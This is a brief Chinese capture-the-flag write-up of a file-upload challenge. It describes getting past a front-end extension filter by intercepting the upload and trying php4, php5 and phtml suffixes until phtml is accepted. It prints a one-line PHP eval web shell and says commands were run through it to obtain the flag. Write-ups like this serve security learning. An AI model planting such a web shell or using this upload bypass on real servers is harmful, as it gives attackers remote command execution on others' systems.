解题过程 通过观察页面得该题为文件上传漏洞类型: 尝试上传 .php 类型的文件,发现报错: 说明其在前端代码中禁止了该类型文件的上传,我们修改文件后缀,上传 .jpg 类型的文件,且内容为: <?php @eval($_POST['x']); ?> 并抓包修改后缀为 php : 发现回显中也不允许,尝试修改为 php4、php5、phtml等文件后缀,最后发现只有 phtml 后缀的文件上传成功: 随后使用木马中的参数进行命令执行,得到flag: